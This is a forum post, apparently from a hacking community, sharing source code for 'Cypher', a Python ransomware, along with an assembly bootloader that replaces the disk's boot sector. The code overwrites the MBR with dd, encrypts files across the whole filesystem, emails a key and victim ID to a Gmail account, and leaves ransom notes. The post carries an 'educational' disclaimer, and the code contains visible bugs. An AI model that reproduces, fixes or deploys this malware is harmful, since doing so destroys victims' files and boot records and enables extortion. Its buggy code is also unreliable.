chevron_left chevron_right
Login Register invert_colors photo_library


Stay updated and chat with others! - Join the Discord!
Thread Rating:
  • 0 Vote(s) - 0 Average


Python based Ransomware. filter_list
Author
Message
Python based Ransomware. #1
Ethics of authoring malware aside. I think it is an interesting subject. As such i have a project in development that is basically a ransomware. Now i have never written one of these before so some improvements may be needed,

I decided to call my malware Cypher.

Cypher is a proof of concept ransomware which implements the PyCrpto module and uses gmail(Currently) as a sort of command and control server. It is a work in progress as of yet and i will be releasing updates periodically depending on the amount of time i have to work on the project. The general idea is that the personal files get encrypted and the bootsector gets overwritten with a custom bootloader. As of yet i am looking into writing the bootlocker directly to disk, since at the moment i am just calling `dd` from within the script.

Code:
# Cypher is a work in progress, as such this is an Alpha release of the encryption
# module, for reporting bugs feel free to open an issue or should you wish to
# collaborate on this, pull requests are welcomed as well.

import os
import sys
import random
import struct
import smtplib
import string
import datetime
import time

import getpass as gp

from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool


# Function to generate our client ID
def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))


ID = gen_client_ID(12)
key = RSA.generate(2048)
exKey = RSA.exportKey('PEM')

# Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
if sys.platform == 'linux2' and gp.getuser() == 'root':
    try:
        os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass    
else:            
    try:
        os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass



def send_ID_Key():
    ts = datetime.datetime.now()
    SERVER = "smtp.gmail.com"         
    PORT = 587                         
    USER= "address@gmail.com"        # Specify Username Here
    PASS= "prettyflypassword"        # Specify Password Here
    FROM = USER
    TO = ["address@gmail.com"]         
    SUBJECT = "Ransomware data: "+str(ts)
    MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
    message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
    try:              
        server = smtplib.SMTP()
        server.connect(SERVER, PORT)
        server.starttls()
        server.login(USER, PASS)
        server.sendmail(FROM, TO, message)
        server.quit()
    except Exception as e:
        # print e
        pass
    


def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):

    if not out_filename:
        out_filename = in_filename + '.crypt'

    iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)

            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += ' ' * (16 - len(chunk) % 16)

                outfile.write(encryptor.encrypt(chunk))
                
                

def single_arg_encrypt_file(in_filename):
    encrypt_file(key, in_filename)

def select_files():
    
    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
           ".mov", ".gif", ".txt", ".py", ".pyc", ".jar"]
          
    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.push(os.path.join(root, file))

    # Parallelize execution of encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
                

def note():
    
    readme = """
    
    .d8888b.                    888                      
    d88P  Y88b                   888                      
    888    888                   888                      
    888        888  888 88888b.  88888b.   .d88b.  888d888
    888        888  888 888 "88b 888 "88b d8P  Y8b 888P"  
    888    888 888  888 888  888 888  888 88888888 888    
    Y88b  d88P Y88b 888 888 d88P 888  888 Y8b.     888    
    "Y8888P"   "Y88888 88888P"  888  888  "Y8888  888    
                    888 888                                
             Y8b d88P 888                                
             "Y88P"  888    
    
    
    
    Hello, unfortunately all your personal files have been encrypted with millitary grade encryption and will be impossible
    to retrieve without aquiring the encryption key and decrypting binary.
    As of yet these are not available to you since the Cypher ransomware is still under construction.
    We thank you for your patience.

    Have a nice day,

    The Cypher Project."""     
    
    # Windows variant
    # outdir = os.getenv('USERNAME') + "\\Desktop"
    
    outdir = os.getenv('HOME') + "/Desktop/"
    outfile = outdir + "README"
    
    handler = open(outputfile, 'w')
    handler.write(outfile, ID)
    handler.close()
    
if __name__=="__main__":
    gen_client_ID()
    send_ID_Key()
    
    try:
        select_files()
        note()
    except Exception as e:
        pass

Bootlocker source in ASM.

Code:
[BITS 16]
[ORG 0x7C00]
MOV SI, Msg
CALL OutStr
JMP $
OutChar:
MOV AH, 0x0E
MOV BH, 0x00
MOV BL, 0x07
INT 0x10
RET
OutStr:
next_char:
MOV AL, [SI]
INC SI
OR AL, AL
JZ exit_function
CALL OutChar
JMP next_char
exit_function:
RET
Msg db 0xA, 0xD, 0xA, 0xD
   db '########################################################', 0xA, 0xD
   db '#   Your harddrive is encrypted with military grade    #', 0xA, 0xD
   db '#   encryption, you wont get your files back, since    #', 0xA, 0xD
   db '#  the Cypher ransomware is still under construction   #', 0xA, 0xD
   db '                                              ', 0xA, 0xD
   db '########################################################', 0xA, 0xD, 0xA, 0xD
   db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
   db 'Have a nice day,', 0xA, 0xD
   db '     The Cypher Project', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55


The purpose of this thread would be to discuss ideas, better implementations and think about general improvements. This is a project intended for experimental and educational purposes. As such i would advise against deploying this malware in active engagement. Thank you for your understanding.

The project's github page can be found here.

Reply




Messages In This Thread
Python based Ransomware. - by VectorSEC - 10-10-2016, 10:10 AM
RE: Python based Ransomware. - by BreShiE - 10-11-2016, 12:03 AM
RE: Python based Ransomware. - by Valkyrie - 10-11-2016, 12:12 AM
RE: Python based Ransomware. - by Bish0pQ - 10-11-2016, 10:17 AM
RE: Python based Ransomware. - by VectorSEC - 11-04-2016, 06:00 AM
RE: Python based Ransomware. - by Despised - 11-04-2016, 10:06 AM
RE: Python based Ransomware. - by BadSnow - 01-09-2017, 08:34 PM
RE: Python based Ransomware. - by prankd - 01-12-2017, 08:02 PM
RE: Python based Ransomware. - by silur - 02-01-2017, 01:37 PM



Users browsing this thread: 1 Guest(s)